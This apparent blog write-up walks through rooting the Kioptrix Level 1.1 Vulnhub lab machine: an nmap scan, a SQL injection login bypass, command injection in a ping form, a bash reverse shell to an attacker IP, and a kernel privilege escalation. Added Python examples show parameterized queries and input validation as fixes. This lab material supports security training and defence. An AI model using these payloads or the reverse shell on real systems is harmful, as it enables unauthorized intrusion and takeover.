Kioptrix: Level 1.1 (#2)

Omar Ahmed
4 min read · Dec 27, 2020

This is my second write-up, solving the Kioptrix Level 1.1 (#2) machine from Vulnhub as training for the OSCP.

Description of Kioptrix VM Image Challenges:

These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

You can Download the Machine from here.

Network Scanning

Let's find the IP of the vulnerable box with netdiscover.

#sudo netdiscover -i eth0

The Target IP is 192.168.1.107

Enumeration

Let's scan all ports and identify the running services with Nmap:

le0mx@LE0MX:~$ sudo nmap -A -O -sV 192.168.1.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-27 05:22 CST
Nmap scan report for desktop-mf54b8n (192.168.1.107)
Host is up (0.00034s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020-12-26T12:07:48+00:00; -23h15m28s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:0C:A9:EB (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -23h15m28s
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms desktop-mf54b8n (192.168.1.107)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.11 seconds

Several ports are open: 22 (SSH, OpenSSH 3.9p1 with SSHv1 still enabled), 80 (HTTP, Apache 2.0.52), 443 (HTTPS, still offering SSLv2), 631 (CUPS 1.1) and 3306 (MySQL).

Let’s check the web page,

Okay, it's a login page. I'll check the source code first.

Nothing interesting there, so let's go back to the login form and try SQL injection. I assume the query in the PHP file is built by string concatenation, something like:

SELECT * FROM users WHERE username = '$username' AND password='$password'

Let's try logging in with this username and password:

administrator
' OR 'LE0MX'='LE0MX

Yeeees, it's working, and I found this page:
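To show why the login bypass above works and what fixes it, here is an added example that is not part of the original write-up and not the machine's PHP code. It rebuilds the assumed query in Python against an in-memory SQLite table (a stand-in for the box's MySQL backend; the table, its columns and the sample credentials are constructed for the demo), once by string concatenation and once with a parameterized query, and feeds both the exact payload used in the write-up.

```python
import sqlite3

# Constructed demo data: one user with a known password (a real app would store a hash).
DEMO_USER = "administrator"
DEMO_PASS = "s3cret-demo-password"


def make_db():
    """Create an in-memory users table mirroring the assumed schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", (DEMO_USER, DEMO_PASS))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query the way the write-up assumes the PHP does: by
    concatenating raw input into the SQL string. A quote in the input
    changes the query's structure."""
    sql = ("SELECT * FROM users WHERE username = '" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same query, but the values travel as bound parameters, so the
    database never parses user input as SQL."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    """Returns (vulnerable_result, safe_result, safe_with_real_password)."""
    conn = make_db()
    payload = "' OR 'LE0MX'='LE0MX"          # the password used in the write-up
    vuln = login_vulnerable(conn, DEMO_USER, payload)   # True: OR clause matches every row
    safe = login_safe(conn, DEMO_USER, payload)         # False: payload is just a literal string
    legit = login_safe(conn, DEMO_USER, DEMO_PASS)      # True: real credentials still work
    return vuln, safe, legit


if __name__ == "__main__":
    print(demo())
```

With concatenation the final statement becomes `... AND password='' OR 'LE0MX'='LE0MX'`, and since the `OR` branch is always true the first row comes back regardless of the password. With bound parameters the same characters are compared verbatim against the stored password and no row matches.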

Hmm, let's enter any IP, like 8.8.8.8, and click submit.

It looks like a scene I've seen before in a CTF challenge: a form that pings whatever you type in, which is a classic spot for command injection.
Let's confirm that by submitting this:

8.8.8.8; ls

Yes, it's working: the output includes a listing of the web directory (index.php, pingit.php).

Now let's get a reverse shell. Instead of 8.8.8.8, submit:

; bash -i >& /dev/tcp/192.168.1.105/5555 0>&1

With netcat listening on port 5555 on my machine, I get a shell on the box, but only as the web server's user.
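The ping form fails because user input is pasted straight into a shell command line, so `;` ends the ping and starts a second command. Here is an added example, not part of the original write-up and not the machine's pingit.php, showing the vulnerable pattern next to a hardened one in Python: the input is parsed as an IP address with the standard `ipaddress` module and the command is built as an argument list with no shell involved. The function names and the `-c 3` ping count are my own choices for the demo; no command is actually executed.

```python
import ipaddress
import shlex


def vulnerable_command(user_input):
    """The pattern behind the bug: the raw form value is spliced into a
    shell string. Shown only so the two approaches can be compared; the
    demo never executes it."""
    return "ping -c 3 " + user_input


def validate_target(user_input):
    """Accept only a syntactically valid IPv4/IPv6 address and return it in
    canonical form; anything else (including shell metacharacters) is
    rejected with None."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None


def ping_argv(user_input):
    """Build the argument vector a hardened handler would hand to
    subprocess.run(argv) (no shell=True). Returns None when the input
    is not an IP address, so the request never reaches the OS."""
    target = validate_target(user_input)
    if target is None:
        return None
    return ["ping", "-c", "3", target]


def looks_like_injection(user_input):
    """Cheap detection heuristic for request logs: flag inputs that contain
    shell metacharacters or parse as more than one shell word."""
    if any(ch in user_input for ch in ";|&`$\n"):
        return True
    try:
        return len(shlex.split(user_input)) != 1
    except ValueError:          # unbalanced quotes are suspicious too
        return True


if __name__ == "__main__":
    for sample in ["8.8.8.8", "8.8.8.8; ls", "; bash -i"]:
        print(repr(sample), "->", ping_argv(sample), "flagged:", looks_like_injection(sample))
```

Validation by parsing (rather than by blacklisting characters) is the real fix: an IP address can only be an IP address, and passing it as a separate argv element means there is no shell to interpret it. The `looks_like_injection` heuristic is useful on the defensive side for spotting attempts in web logs, not as a substitute for the validation.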

Let's check whether this kernel version has a known privilege escalation exploit by searching Exploit-DB.

After searching, I found this privilege escalation code (you can get it from here).

Let's use it. First, on my attacking machine, I copy the exploit into /var/www/html and start Apache so the target can fetch it:

#sudo service apache2 start

Now I go back to the shell on the target and run these commands:

Yeeeeeeeeeeees, I have root now.
